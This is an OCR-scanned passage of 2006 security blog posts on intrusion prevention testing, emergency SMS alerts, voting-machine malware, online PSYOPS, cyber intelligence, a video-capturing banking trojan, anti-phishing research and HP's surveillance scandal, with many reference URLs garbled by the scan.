. http: //ddanchev.bl 
10, notp://219.256.194,12/t€ic. gov/sndex nest. nem 
11. 
12. 
13. 
14. 
15. 
16. 


17. http: //ddanchev.blogspot.com/2006/03/anti-phishing-toolbars-can-you-trust .htm 


2.9.18 Testing Intrusion Prevention Systems (2006-09-13 22:00) 


[1] * Informative testings results of various [2]IPSs such as [3]Juniper IDP 200, [4]Cisco IPS 
4240, [5]JeSoft ThreatWall 200, [6]ForeScout ActiveScout 100, [7]McAfee IntruShield 2700. 


Here’s how they tested : 


"In order to create a base environment in which to compare the different appliances, 
we set up a single system within our test network to be the target of Core Impact’s simulated 
attacks. We chose a system running the most vulnerable operating system we could think 
of—Windows 2000 Service Pack 2 with no additional service packs or security updates. We 
temporarily opened the channels on the test network’s firewall and installed Core Impact on 
a system outside the network. We then proceeded to detect and “attack” the Windows 2000 
system to identify its vulnerabilities. Of the hundreds of attack modules available, we picked 
85 of the most applicable. Knowing how our target system was vulnerable and the attacks 
we could launch against it, we connected each IPS in turn according to its recommended 
configuration. We then allowed each IPS to function in a real-world network environment for 
a day or more. Eventually we rebooted the Windows 2000 machine and ran Core Impact to 
simulate a barrage of intrusions. Finally, we adjusted the security profiles of each IPS and ran 
the tests one more time. The result was a complete picture of how effective each IPS was at 
preventing attacks—both out of the box and after fine-tuning. The good news is, we were able 
to tweak each IPS to completely shut down the Core Impact attacks." 


There are, however, hidden costs related to IPSs, and that’s increased maintainance and 
reconfiguration time, possible decline in productivity. The key is understanding the pros and 
cons of your solution, educating the masses of users, and run a departamental, compared to a 
comany-wide enforcement at the first place as far as host based IPS are concerned. Network 
based IPSs sensitivity is proportional to the level of false alerts generated, so figure out how 
to balance and adapt the solution to your network. 


Suspicious system behaviour is such an open topic term to the majority of end users, 
keep it in mind whatever you do when dealing with HIPS. And do [8]your [9]homework of 
course. 


1. http://www. gcn.com/print/25_27/41911-1.htm 


2. http: //en.wikipedia.org/wiki/Intrusion_prevention_system 


3. http: //www.gcn.com/print/25_27/41906-1.htm 
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4 
5 
6. 
7 
8. i : i 

9. 


ttp://www.securityfocus.com/infocus/1670 


ttp://www.scmagazine.com/us/suppliers/listing/89283/intrusion-prevention-systems/ 


2.9.19 Vulnerabilities in Emergency SMS Broadcasting (2006-09-13 22:07) 


[1] * There’s been a recent [2]test of emergency cell phone alert in the Netherlands - original 
article was [3]here - and while broadcasting supposidly reaches the largest number of people 
in the surrounding area, timing and countless number of factors also matter : 


"Cell phones throughout a downtown hotel beeped simultaneous Tuesday with an alert: 
there is a suspicious package in the building. It was a drill, run by Dutch authorities testing 
an emergency "cell broadcasting" system that sends a text message to every mobile phone 
in a defined area. Representatives from 21 national governments, New York City and the U.S. 
Federal Emergency Management Agency, or FEMA, watched the signal go out to cell phones 
throughout the Sofitel hotel in Amsterdam. About half the people in the building then followed 
instructions and evacuated. "We want to see what worked and what didn’t," said David Webb, 
of FEMA’s Urban Search and Rescue Program. "The EU (European Union) is really leading the 
way with this technology." 


What if : 


- Even in case that key emergency personal were to use a seperate communication net- 
work, radio for instance, broadcasting to anyone accepting could result in significant delays, 
and even though the message is sent, it doesn’t mean it would take advantage of the 
momentum 


- [4]cell phone jammers are often used by hotels to preserve the unique atmosphere 
and undisturbed conference meetings can prove contradictive, excluding the fact that the 
parties supposidly plotting the attack don’t use one by themselves 


- despite the fact that [5]lone in five will pick up their mobile during sex, how many ob- 
sessively check for newly arrived sms messages? 


- how would a tourist know how the successfully authenticate the local authories at the 
first place, in case of emergencies watch out for an sms from 010101, now | assume you know 
how easily | can sms you from the same number and impersonate the number 


- what should the user be mostly aware of be aware of, mobile malware, SMSishing, or 
"call this O 900 or else | won’t tell you where’s the attack" type of messages 


- from a multilingual point of view, will it be using English by default, and how many 
would be still enjoying their meals while everyone’s leaving 


Great idea, but it may prove challenging to evaluate the actual results in a timely man- 
ner. Sent doesn’t mean received or read on time, even actioned upon. 
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Recommended reading: 

[6]SMS disaster alert and warning systems - don’t do it ! 

[7]Revisiting SMS during Disasters 

[8]Concept Paper on Emergency Communications during Natural Disasters 
[9]Exploiting Open Functionality in SMS- Capable Cellular Networks 
[10]The Role of Mobiles in Disasters and Emergencies 


1. http: //photos1. blogger. com/blogger/1933/1779/1600/alerts. gif 


2. http://cms.firehouse.com/content/article/article. jsp?sectionId=46%id=51061 
3. http://64.233.161.104/search?q=cache:LleIs3m46TMJ : www. chron. com/disp/story.mpl/ap/fn/4164397 .htm1+Dutch+Te 


st+Emergency+Cel1+Phonetalert&amp ;hl=en&ct=clnk&cd=1 


4. http://www.spyzone.com/ProductDetails.aspx?productID=544&selection=7&category=26 


5. http://money.cnn.com/2006/08/25/technology/fastforward_kirkpatrick.fortune/index.htm?section=money_techno 


6. 

7 

8. http://tsunami.ait.ac.th/Documents/disaster_communication_assistance_concept_paper.pdf 
9. 

10. 


2.9.20 Malware on Diebold Voting Machines (2006-09-13 22:50) 


[1] * Continuing the previous post on "[2]How to Win the U.S Elections" seems like malware 
is indeed [3]diebold voting machines compatible - [4]related videos. 


The main [5]findings of the study are: 


- Malicious software running on a single voting machine can steal votes with little if any 
risk of detection. The malicious software can modify all of the records, audit logs, and 
counters kept by the voting machine, so that even careful forensic examination of these 
records will find nothing amiss. We have constructed demonstration software that carries out 
this vote-stealing attack. 


- Anyone who has physical access to a voting machine, or to a memory card that will 
later be inserted into a machine, can install said malicious software using a simple method 
that takes as little as one minute. In practice, poll workers and others often have unsupervised 
access to the machines. 


- AccuVote-TS machines are susceptible to voting-machine viruses — computer viruses 
that can spread malicious software automatically and invisibly from machine to machine 
during normal pre- and post-election activity. We have constructed a demonstration virus that 
spreads in this way, installing our demonstration vote-stealing program on every machine it 
infects. 


- While some of these problems can be eliminated by improving Diebold’s software, oth- 


ers cannot be remedied without replacing the machines’ hardware. Changes to election 
procedures would also be required to ensure security. 
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IP enabled, Windows running ATM’s with anti-virus, IPv6 enabled fridges with anti-virus, 
smart phones with anti-virus, Play Stations with anti-virus, birds as early warning systems for 
an epidemic, so where’s my signature, dude? 


1 fvep:/ photos logger. con/toggex/1933/1779/1600/hatioveen gi 
2. http:/ /adanchev. blogspot. con/2006/07 /now-to-¥in-us-elections al 
a Rete: //aepetscy pctaceton onal cera 

4. http://itpolicy.princeton.edu/voting/videos .htm 

5 


. http: //itpolicy.princeton.edu/voting/summary.htm 


2.9.21 Prosecuting Defectors and Appointing Insiders (2006-09-13 23:14) 


[1] * In the year 2006, those who control Russia’s energy reserves control a huge portion 
of the world’s energy market - [2]renewable energy is the future. And as you can imagine 
they’re for sure not controlled by some newly born [3]Russian millionaires - a great benchmark 
for how vibrant a country’s economy or level of corruption really is. Seems like the long-term 
effects of a [4]planned economy are still a political doctrine, and the invisible hand of the 
market is still short enough to feel the Russian energy sector as [5]Russian intelligence chief's 
son has been named adviser to oil company chairman : 


"A son of the head of Russia’s main intelligence agency has been named an adviser to 
the chairman of state oil company OAO Rosneft, the daily newspaper Kommersant reported 
Wednesday, citing an unidentified source on Rosneft’s board of directors. Andrei Patrushev, 
the 25-year-old son of Federal Security Service (FSB) director Nikolai Patrushev, had previously 
been an FSB official himself, working in the department that keeps tabs on the Russian oil 
industry, according to Kommersant." 


The courage to rise above shown by [6]Mikhail Khodorkovsky has its own butterfly ef- 
fect, and it’s so easily predictable one. Here’s a [7]Google bomb for you - it means enemy of 
the people. Here’s [8Janother. [9]Bpar Hapoga or a vivid [10]protectionist? 


_ep://photost blogger. con/blogger/1959/1770/1600/=py.Jpé 
ip: / /en, wikipedia, org/viki Renovable,onergy 
| hetp:/ /wuv. cS org/russia/ jomnson/9474-9.cim 
. http://en.wikipedia. org/wiki/Planned_economy 


1 
2 
3 
4 
5. http://www.iht.com/articles/ap/2006/09/13/business/EU_FIN_COM_Russia_Rosneft.php 
6 
7 
8 
9 


. http://en.wikipedia. org/wiki/Mikhail_Khodorkovsk 


ttp://www. google .com/search?hl=enklr=kq=/,D0/,B2/D1%807%D0/%,B0/D0/,B3+7%D0/%BD/4,D0/B0/%D1%807%D0/,BEAD0%B4/,D0/%BO 
ttp://www.google.com/search?hl=enklr=&q=miserabletfailure 
. ttp://ru.wikipedia.org/wiki/%C37/%,90%C2%92/%C3%917%,C2%80%C3%,90%C2/%BO%C3/%90%C2%B3_%C3%90%C2/%BDLC3/490%C2%B0%C 
A91%C2L80%C3%,90%C2/,BELC3/%90%C2%B4/,C3%90%,C2/%,B0 


10. http://en.wikipedia.org/wiki/Protectionis 


2.9.22 Internet PSYOPS - Psychological Operations (2006-09-14 13:11) 


[1] * Psychological operations or [2]PSYOPS is an indirect use of [3]information warfare 
methods to deceive, shape and influence the behavior and attitude of the targeted audience 
- military marketers with greater access to resources and know-how. The Internet acting as 
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a global-reaching, cost-effective platform for dissemination of a message, rumor, lie, inside 
information is directly influencing the evolution of the concept. 


You may find this research conducted back in 2001, still relevant on the basics of psy- 
chological operations and propaganda online. A brief summary of [4]The Internet and 
Psychological Operations : 


"As an information medium and vehicle of influence, the Internet is a powerful tool, in 
both open societies as well as in those whose only glimpse of the outside world is increasingly 
viewed and shaped through webpages, E-mail, and electronic chat rooms. Moreover, the 
sword cuts both ways, as unconstrained (legally, socially, politically) adversaries find the 
Internet an effective vehicle for influencing popular support for their cause or inciting the 
opposite against the U.S. or its interests. Consequently, the realm of military psychological 
operations (PSYOP) must be expanded to include the Internet. Just as obvious is the need for 
action to remove or update current policy and legal constraints on the use of the Internet by 
military PSYOP forces, allowing them to embrace the full range of media, so that the U.S. will 
not be placed at a disadvantage. Although current international law restricts many aspects 
of PSYOP either through ambiguity or noncurrency, there is ample legal room for both the 
U.S. and others to conduct PSYOP using modern technology and media such as the Internet. 
Existing policy and legal restrictions, however, must be changed, allowing military PSYOP 
forces to both defend and counter adversarial disinformation and propaganda attacks which 
impact on the achievement of military objectives. By examining this issue, | hope to highlight 
the importance of the Internet for PSYOP and foment further discussion." 


Undoubtedly, [5]Abu Ghraib’s fiasco is among the most relevant cases of unintentional 
PSYOPS in reverse, where the leak’s echo effect would continue to spell sskepticism towards 
what democracy really is. And while there’re indeed legal issues to consider when using such 
operations, what is legal and illegal in times of war is questionable. 


Some basic examples: 

- your [6]web sites spread messages of your enemies 

- [7]sms messages and your voice mail say you’re about to lose the war 

- your fancy military email account is inaccessible due to [8]info-warriors utilizing the power of 
the masses, thus script kiddies to distract the attention 

- you [9]gain participation, thus support 

- you feel like Johnny Mnemonic taking the elevator to pick up the 320 GB of R &D data when 
a [10]guerilla info-warrior appears on the screen and wakes you up on your current stage of 
brainwashing 

- starting from the basics that the only way to [11]ruin a socialist type of government is to 
introduce its citizens to the joys of capitalism - it always works 

- [12]hacktivism - traffic acquisition plus undermining confidence 

- propaganda - [13]North Korea is quite experienced 

- self-serving news items, commissioned ones 

- achieving Internet echo as a primary objective 

- introducing biased exclusiveness 

- stating primary objectives as facts that have already happened 

- impersonation 


The evolution of online PSYOPS is on its way and is actively utilized by both adversaries, 
and everyone in between, it’s entirely up to you to be either objective, or painfully subjective. 
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. bttp://en.wikipedia.org/wiki/Psychological_operations 


. http: //en.wikipedia.org/wiki/Psychological_warfare 

. http: //photos1 . blogger . com/blogger/1933/1779/1600/information_warfare.1.gif 
. http://ics.leeds.ac.uk/papers/pmt/exhibits/632/internetandpsyops. pdf 

_ http: //yro.slashdot . org/article.p1?sid=04/11/07/1442217 

. http: //wuw.nato.int/docu/review/2001/0104-04 htm 


. http://www. boingboing. net/2006/07/28/israel_using sms_rec.htm 


. http: //ddanchev.blogspot.com/2006/09/chinese-hackers-attacking-us.htm 


ttp://www.boingboing.net/2006/07/18/image_of_the_day_chi.htm 


jo) 


A 


http: //www.theage.com.au/news/technology/israel-hacks- into-hezbollah-tv-radio/2006/08/02/1154198175078. 


m. 


1. http://cryptome.org/invent-intel .htm 
. http://ddanchev. blogspot .com/2006/02/hacktivism-tensions.htm 
. http://ddanchev. blogspot .com/2006/08/north-koreas- strategic-developments.htm 
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2.9.23 Leaked Unmanned Aerial Vehicle Photo of Taliban Militants (2006-09-18 16:03) 


[1] * Missed shot from a predator drone due to moral concerns, remarkable move and one 
visionary enought not to provoke another media fiasco of killed civilians for the sake of killing 
alleged militants. "[2]U.S. Military Investigates Leaked Photo" 


"The grainy black and white photo shows what NBC says are some 190 Taliban militants 
standing in several rows near a vehicle in an open area of land. Gunsight-like brackets were 
positioned over the group in the photo. NBC quoted one Army officer who was involved with 
the spy mission as saying "we were so excited" that the group had been spotted and was 
in the sights of a U.S. drone. But the network quoted the officer, who was not identified, as 
saying that frustration soon set in after the officers realized they couldn’t bomb the funeral 
under the military’s rules of engagement." 


[3]Hezbollah are also known to be able of operating drones, as well as their "window-shopping" 
[4]purchasing capabilities for night vision gear but how come? Politically independent parties 
whose revenues get generated by their ability to be totally neutral and, of course, tactics for 
bypassing gear embargoes. 


However, it would be naive to assume everyone is as rational as you are, as it’s a rather 
common practice for various military forces to build up their foundations near highly popu- 
lated areas, schools and hospitals. Insider leaks like these show certain weaknesses, namely 
operatives with access to information whose significance slightly devaluated, so why not 
generate some buzz on the findings. 


Naturally, the [5]Pentagon is taking measures to limit the potential of yet another media 
fiasco, taking into consideration the growing use of gadgets in the military. Moreover, suc- 
cessfully [6]realizing the power of OSINT, an information security/web site alert was issued 
during August on [7]what can’t be posted at .mil sites. 


Predator UAV image of Serbian fighters surrendering in Kosovo, courtesy of [8]Military 
Intelligence Satellites. 


1. http://photos1. blogger .com/blogger/1933/1779/1600/surrender_predator . jpg 
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ttp://www.military.com/NewsContent/0, 13319, 113440,00.htm 
ttp://ddanchev. blogspot .com/2006/09/hezbollahs-use-of-unmanned-aerial.htm 


http: //www.sfgate.com/cgi-bin/article.cgi?file=/c/a/2006/08/20/MNGK9KLVH41 . DT 
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3. 

4. 
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2.9.24 Cyber Intelligence - CYBERINT (2006-09-18 21:16) 


[1] * HUMINT, [2]SIGINT, [3]TECHINT, all concepts for gathering intelligence and supporting 
decision makers on emerging trends are invaluable by their own definitions, yet useless if 
not coordinated for achieving the ultimate objective. Cyberspace is so much more than a 
social phenomenon or the playground of countless pseudo personalities. Info-warriors and 
analysts are realizing that Cyberspace is becoming so disperse and versatile, that a seperate 
practice of Cyber Intelligence is necessary to proactively respond - and always be a step ahead 
of developing new capabilities - of [4Jemerging players, [5]threats, and [6]tactics. Virtual 
situational awareness is as important to intelligence analysts, as it is important to security 
professionals wanting to remain competitive. 


What’s Cyber Intelligence, or Intelligence analysis for Internet security, can we model it, 
how long would the model survive before what used to static turns into a sneaky variable 
knowing its practices has been exposed? What would the ultimate goal of CYBERINT be? 
To map the bad neighborhoods and keep an eye on them, to profile the think-tanks and 
assess their capabilities, background motivations for possible recruitment? Or to [7]secure 
Cyberspace, no matter how megalomanic it may sound, or to basically acquire know-how to 
be used in future real-life or cyber conflicts? 


[8]Intelligence Analysis for Internet Security proposes an intelligence model for the de- 
velopment of an overall systems security model, here’s an excerpt : 


"Obtaining prior knowledge of both threats and vulnerabilities - as well as sensitivity to 
possible opportunities to exploit the vulnerabilities - is essential. Intelligence analysis, of 
course, operates at different levels, ranging from the specific to the general, and from short- 
term incidents and operations to long term patterns and challenges. Each form or level of 
analysis is crucial, and complements and supplements the others. Nevertheless, it is important 
to distinguish them from one another and to be clear at which level the activities are taking 
place. It is also important to recognize that the most critical insights will be obtained from 
fusion efforts that combine these different levels. The several complementary levels of intel- 
ligence analysis are strategic analysis, tactical analysis and operational analysis. In practice, 
these categories shade into each other and are not always sharply differentiated, and differing 
definitions for these terms exist in the intelligence community. Nevertheless, they offer a 
useful framework within which intelligence tasks and requirements can initially be delineated." 


A very informative and relevant research emphasizing on strategic intelligence analysis, 


tactical intelligence analysis, operational intelligenec analysis, and how cyber intelligence 
intersects with traditional approaches. 
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What’s the core of CYBERINT? 


- the maturing concept of [9]cyberterrorism, [10]propaganda and [11]communications 
online, thus huge amounts of data to be aggregated and analyzed 

- an early warning system for new attack tools, their easy of use, availability, ability to be 
tracked down, and level of sophistication 

- offensive CYBERINT is perhaps the most interesting and aggresive approach | consider fully 
realistic nowadays. Operational initiatives such as nation-wide pen testing, OS and IP space 
mapping for instant exploitation, segmented economic espionage attacks - [12]ip theft worms 
achieving efficiency - passive google hacking and reconnaissance, tensions engineering, zero 
day vulnerabilities arms race 


Outsourcing to [13]objective providers of intelligence and threats data should also be 
considered, but then again it’s just a tiny portion of what can actually be achieved if a 
cross-functional team is acting upon a common goal - to be a step ahead of tomorrow’s events, 
and pleasently going through threat analysis conducted year ago predicting and responding 
to them. 


If you don’t have enemies, it means you're living in a world of idleness, the more they 
are, the more important is what you’re up to. 


Related resources and posts: 

[14]Information Warfare 

[15]Cyberterrorism 

[16]Intelligence 

[17]Benefits of Open Source Intelligence - OSINT 
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2.9.25 Examining Internet Privacy Policies (2006-09-18 21:59) 


[1] * Accountability, public commitment, or copywriters charging per word, privacy policies 
are often taken for fully enforced ones, whereas the truth is that actually no one is reading, 
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bothering to assess them. And why would you, as by the time you've finished you'll again 
have no other choice but to accept them in order to use the service in question - too much 
personal and sensitive identifying information is what | hear ticking. That’s of course the 
privacy conscious perspective, and to me security is a matter of viewpoint, the way you 
perceive it going beyond the basics, the very same way you’re going to implement it - Identity 
2.0 as a single sign on Web is slowly emerging as the real beast. The marketing perspective, 
offers unprecedented and fresh data whose value may be the [2]next big project, balance is 
the key. 


Here’s an interesting research on "[3]Examining Internet Privacy Policies Within the Con- 
text of Use Privacy Values" : 


"In this paper, we present research bridging the gap between management and soft- 
ware requirements engineering. We address three research questions. 1) What are the 
most stringently regulated organizations (health care related organizations including health 
insurance, pharmaceutical, and drugstores) saying in their privacy policy statements? 2) 
What do consumers value regarding information privacy? 3) Do the privacy policy statements 
provide the information that consumers want to know? 


Results from this study can help managers determine the kinds of policies needed to 
both satisfy user values and ensure privacyaware website development efforts. This paper 
is organized as follows. First, we discuss relevant research on privacy, policy analysis, 
and software requirements engineering. Next, we cover the research methodologies of 
content analysis and survey development, and then the survey results. Finally, we discuss 
the results and implications of this work for privacy managers and software project managers." 


The only time privacy policies get read is whenever a [4]leak like [5JAOL’s one happens, 
and mostly for historical purposes, where’s the real value, not the perceived one? Don’t 
responsibly generate privacy policies, consider preemptively appointing [6]chief privacy 
officers, thus commiting yourself to valuing your users’s privacy and having a strategy in 
mind. 


Related resources: 

[7]Privacy 

[8]Snooping on Historical Click Streams 

[9]A Comparison of US and European Privacy Practices 


ttp://www.google.com/trends 
ttp://www4 .ncsu.edu/~jbearp/IEEE_TEM_Privacy_Values. pdf 
http: //ddanchev. blogspot .com/2006/08/aols-search-leak-user-4417749.htm 


1 
2. 

3. : 

4. : 

5. 
6. 

7. 

8. 

9. 


ttp://searchsecurity.techtarget .com/originalContent/0, 289142,sid14_gci1066176, 00.htm 


http: //del.icio.us/DDanchev/Privac 


ttp://ddanchev. blogspot .com/2006/05/snooping-on-historical-click-streams.htm 


ttp://ddanchev. blogspot .com/2006/04/comparison-of-us-and-european-privacy.htm 
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2.9.26 Results of the Cyber Storm Exercise (2006-09-18 22:01) 


[1] * The [2]Cyber Storm exercise [3]conducted in January "simulated a sophisticated cyber 
attack campaign through a series of scenarios directed at several critical infrastructure sectors. 
The intent of these scenarios was to highlight the interconnectedness of cyber systems with 
physical infrastructure and to exercise coordination and communication between the public 
and private sectors. Each scenario was developed with the assistance of industry experts and 
was executed in a closed and secure environment. Cyber Storm scenarios had three major 
adversarial objectives: 


- To disrupt specifically targeted critical infrastructure through cyber attacks 
- To hinder the governments’ ability to respond to the cyber attacks 
- To undermine public confidence in the governments’ ability to provide and protect services" 


Seems like the results from the exercise are [4]already available and among the major 
findings are related to : 


- Interagency Coordination 

- Contingency Planning, Risk Assessment, and Roles and Responsibilities 
- Correlation of Multiple Incidents between Public and Private Sectors 

- Training and Exercise Program 

- Coordination Between Entities of Cyber Incidents 

- Common Framework for Response and Information Access 

- Strategic Communications and Public Relations Plan 

- Improvement of Processes, Tools and Technology 


Frontal attacks could rarely occur, as cyberterrorism by itself wouldn’t need to interact 
with the critical infrastructure, it would abuse it, use it as platform. However, building confi- 
dence within the departments involved is as important as making them actually communicate 
with each other. 


Go through a previous post on the [5]Biggest Military Hacks of All Time in case you’re 
interested in knowing more on specific cases related to both, direct and indirect attacks. 


1, ft tp://photost blogger. con/blogger/1988/1778/1600/warrior pag 
2, htep://eryptone.org/eyberstorn. ppd 

3. http: //www.dhs . gov/dhspublic/interapp/press_release/press_release_0993. xml 
4. http://www. dhs .gov/interweb/assetlibrary/prep_cyberstormreport_sep06.pdf 
5. 


ttp://ddanchev.blogspot.com/2006/09/biggest-military-hacks-of-all-time.htm 


2.9.27 Banking Trojan Defeating Virtual Keyboards (2006-09-19 13:15) 


[1] * The folks behind [2]VirusTotal, just [3]released an [4]Janalysis and an [5]associated video 
of trojan generating video sessions of the infected end user’s login process, thus bypassing 
the virtual keyboard many banks started providing with the idea to fight keyloggers. 


"Today we will analyze a new banking trojan that is a qualitative step forward in the 
dangerousness of these specimens and a new turn of the screw in the techniques used to 


607 


defeat virtual keyboards. The novelty of this trojan lies in its capacity to generate a video clip 
that stores all the activity onscreen while the user is authenticating to access his electronic 
bank. 


The video clip covers only a small portion of the screen, using as reference the cursor, 
but it is large enough so that the attacker can watch the legitimate user’s movements and 
typing when 

using the virtual keyboard, so that he gets the username and password without going into 
further trouble. It would obviously be place a heavy burden on the resources of the computer 
to capture the complete screen, both when generating the video clip as well as sending it to 
the attacker. The main reason for doing only a small portion of the screen referenced to the 
cursor is that the trojan guarantees the speed of the capture to show all the sequence and 
activity with the virtual keyboard seamlessly." 


Anything you type can be keylogged, but generating videos of possibly hundreds of in- 
fected users would have a negative effect on the malware author’s productivity, which is good 
at least for now. Follow my thoughts, the majority of virtual keyboards have static window 
names, static positions, and the mouse tend to move over X and Y co-ordinates, therefore 
doing a little research on the most targeted bank sites would come up with [6]a pattern, 
pattern that should be randomized as much as possible. Trouble is, the majority of phishing 
attacks are still using the static image locations of the banks themselves, when this should 
have long been randomized as well. 

OPIE authentication, suspicious activity based on geotagging anomalies, and transparent 
process for the customer - please disturb me with an sms everytime money go out - remain 
underdeveloped for the time being. You might find Candid Wuest’s research on "[7]Phishing 
in the Middle of the Stream" - Today’s Threats to Online Banking informative reading on the 
rest of the issues to keep in mind. 


[8]No Anti Virus Software, No E-banking for You, or are [9]Projection Keyboards an alter- 
native? 


1 feep:7 photos ogger. cou /ilggor/1935/1779/1600/vixeual Keyboard. gif 
fom 

3, http: / log. nispasec.con/virustotal/d 

4. http://www.hispasec.com/laboratorio/banking_trojan_capture_video_clip.pdf 
s.htp:/ eve. hispasec.con/Iaboratorio/troyano_video en. 

6, eg (ae abraantcc eee focaas/excuive/ieseecg/e ee) Sed 


7. http://www.symantec.com/avcenter/reference/phishing.in.the.middle.of.the.stream. pdf 


8. http: //ddanchev. blogspot .com/2006/05/no-anti-virus-software-no-e-banking. htm 


9. http: //www.alpern. org/weblog/stories/2003/01/09/projectionKeyboards.htm 


2.9.28 Soviet Propaganda Posters During the Cold War (2006-09-22 02:06) 


[1] 
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Posters are a simple, yet influential form of [2]PSYOPS, and their type of one-to-many commu- 
nication method successfully achieves a decent viral marketing effect. Here’s an [3]archive of 
Soviet propaganda posters against the U.S during the Cold War you might find entertaining - 
here’s [4]part 2. "Capitalists from across the world, unite!" 


[5]North Korea’s not lacking behind, and despite the end of the Cold War, is still taking 
advantage of well proven and self-serving psychological techniques to further spread their 
ideology. 


Here are some [6]collections of ITsecurity related ones as well. 


1. 
2. 
3. 
4. 
Di 
6. 


2.9.29 Airport Security Flash Game (2006-09-22 02:31) 


[1] * Ever wanted to snoop through the luggage of others in exactly the same fashion yours 
gets searched through? Try this [2]game, and make sure you keep an eye to the instantly 
updated "dangerous items" unless you want to be held responsible, and lose your badge. 
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1. http: //photos1. blogger. com/blogger/1933/1779/1600/airport_security. jpg 


2. http://www. shockwave.com/contentPlay/shockwave. jsp?id=airportsecurityzmemberStatus=NotSignedI 


2.9.30 Interesting Anti-Phishing Projects (2006-09-22 02:56) 


Seven [1]anti-phishing projects, | especially find the browser recon and countermeasures one 
as a trendy concept, as phishers are already taking advantage of vulnerabilities allowing them 
to figure out a browser’s history, thus establish a more reputable communication with the 
victim - adaptive phishing. 


01. [2]Social Phishing 

The fundamental purpose of this study was to study the effects of more advanced techniques 
in phishing using context. Receiving a message from a friend (or corroborated by friends), we 
hypothesized the credibility of the phishing attempt would be greater 


02. [3]Browser Recon and Countermeasures 

One can use a simple technique used to examine the web browser history of an unsuspecting 
web site visitor using Cascading Style Sheets. Phishers typically send massive amounts of 
bulk email hoping their lure will be successful. Given greater context, such lures can be more 
effectively tailored—perhaps even in a context aware phishing attack 


03. [4]Socially Transmitted Malware 

People are drawn in by websites containing fun content or something humorous, and they 
generally want to share it with their friends. This is considered social transmission: referral to 
a location based on reccommendation of peers. We measured possible malware spread using 
social transmission 


04. [5]Phishing with Consumer Electronics: Malicious Home Routers 
It is easy to "doctor" a wireless router like the ones found at home or at a local WiFi hotspot 
to misdirect legitimate browser links to phoney and often harmful website. 


05. [6]Net Trust 

Individuals are socialized to trust, and trust is a necessary enabler of e-commerce. The human 
element is the core of confidence scams, so any solution must have this element at its core. 
Scammers, such as phishers and purveyors of 419 fraud, are abusing trust on the Internet. All 
solutions to date, such as centralized trust authorities, have failed. Net Trust is the solution - 
trust technologies grounded in human behavior 


06. [7]A Riddle 
Could your browser release your personal information without your knowledge? 


07. [8]Phroogle 
Exploiting comparison shopping engines to bait victims 


You might also be interested in [9]Google’s Anti-Phishing Black and White Lists. 
1. 


2. http://www. indiana. edu/~phishing/social-network-experiment/ 
3. http: //browser-recon. info/ 
4. http://www.verybigad.com/ 


610 


5. http: //www.cs.indiana.edu/~atsow/mal-router/ 
6. http: //ljean.com/netTrust .htm 


7. http://homer .informatics. indiana. edu/cgi-bin/riddle/riddle.cgi 
8. http: //homer.informatics. indiana. edu/cgi-bin/phroogle/phroogle.cgi 
9. http: //ddanchev .blogspot . com/2006/09/google-anti-phishing-black-and-white.htm 


2.9.31 Hezbollah’s DNS Service Providers from 1998 to 2006 (2006-09-22 03:18) 


[1] 


Nice [2]visual representation trying to emphasize on the U.S hosting companies connection : 


"In the following, we examine the Hizballah domains in light of which companies have 
provided DNS service. A domain’s whois record specifies DNS servers, and the DNS servers 
tell browsers what IP address/server is currently hosting the domain. This is a mission critical 
service without which the domains in question would be unreachable. Despite the fact that 
Hizballah is a designated Terrorist entity in the United States, American companies have been, 
and continue to be the primary providers of service to Hizballah. We now know of 40 domains 
of Hizballah, based largely on a list provided by Hassan Nasrollah on a previous incarnation 
of his own web site. Of those 40 domains, 23 are now or have been provided DNS services 
by Alabanza Inc. of Baltimore, Maryland. No other provider comes close. Alabanza’s domain 
name registration business, Bulkregister, is Hizballah’s registrar of choice. See our report 
regarding [3]the registrars of Hizballah’s domains." 


Who knew Hezbollah are indeed the rocket scientistics they pretend to be? [4]UAVs, [5]night 
vision gear, [6]SIGINT gear, or has rocket science became so "outsourceable" nowadays? 


[7]Cyberterrorism isn’t dead, it’s just [8]been [9]silently [10]evolving [11]Junder the [12]um- 
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brella [13]provided by the mainstream media - wrongly understanding the concept, and 
[14]stereotyped speculations. 


1. http: //photos1.blogger. com/blogger/1933/1779/1600/23ju106-hizb_dns- 1024. jpg 


2. http://www. haganah.org.il/harchives/005680.htm 
ttp://www.haganah.org.il/harchives/ 
http: //ddanchev. blogspot .com/2006/09/hezbollahs-use- of-unmanned-aerial .htm 


ttp://www.sfgate.com/cgi-bin/article.cgi?file=/c/a/2006/08/20/MNGK9KLVHA41 . DT. 


3. 

4. 

5. 

6, http://w defensetech,org/archives/002785 heal 

7. netp://w hagenah. org. 51/kagatah/snternet tal 

8, http: / /Adanchev. blogspot. com/2006/00/ internet peyops-paychological heal 

9, http: //adanchev. blogspot .con/2006/05/technorinpersalist-and-effectof nt 


10. http://ddanchev.blogspot .com/2006/08/cyber-terrorism-communications-and_22.htm 


11. 
12, 
13, 


2.9.32 HP’s Surveillance Methods (2006-09-25 02:00) 


[1] * Seems like it’s not just [2]Board of Directors’ Phone Records that were obtained by 
HP under the excuse of enforcing an exemplary corporate citizenship, but on pretty much 
everyone that communicated with them or is somehow in their circle of friends - no comments 
on the [3]boring minutes of meetings shared with the press as the main reason all this. Besides 
passing the ball to the next board member over who’s been aware of, [4]more details on the 
exact methods used by HP emerge : 


- HP obtained phone records for seven current or former HP board members, nine journalists, 
and their family members; 


- HP provided investigators with the Social Security number of one HP employee, in addition 
the Social Security numbers of 4 journalists, 3 current and former HP board members, and 1 
employee were also obtained by investigators; 


- HP investigators attempted to use a tracer to track information sent to a reporter; 


- The concept of sending misinformation to a reporter and the contents of that email were 
approved by Mr. Hurd, although no evidence was found to suggest that he approved the use 
of the tracer for surveillance; 


- Investigators hired by HP monitored a board meeting, a trip to Boulder taken by a board 
member, as well as the board member’s spouse and family members; 


- In February of 2006, investigators watched a journalist at her residence and in February of 
2006 “third party investigators may have conducted a search of an individual’s trash.” By the 
time HP provided the associated parties SSNs, they’ve pretty much left them on the sharks 
to finish the rest, disinformation though, is something | previously thought they didn’t do, but 
with dumpster diving in place as well, | guess they did order the entire all-in-one surveillance 
package. 


[5]Megacorp ownz your digitally accumulated life, and yes, it can also engineer and snoop on 
your real one. All they were so talkative about, is publicly available information that every 
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decent analyst should have definitely considered starting from HP’s historical performance 
as a foundation for future speculations. In between [6]HP is (was) also sponsoring a Privacy 
Innovation Award. 


Who's the winner at the bottom line? That’s ex-CEO Carly Fiorina - [7]phone records 
also obtained - whose upcoming book will [8]profitably take advantage of the momentum. 


1. http://photos1. blogger .com/blogger/1933/1779/1600/spookapt .0. gif 


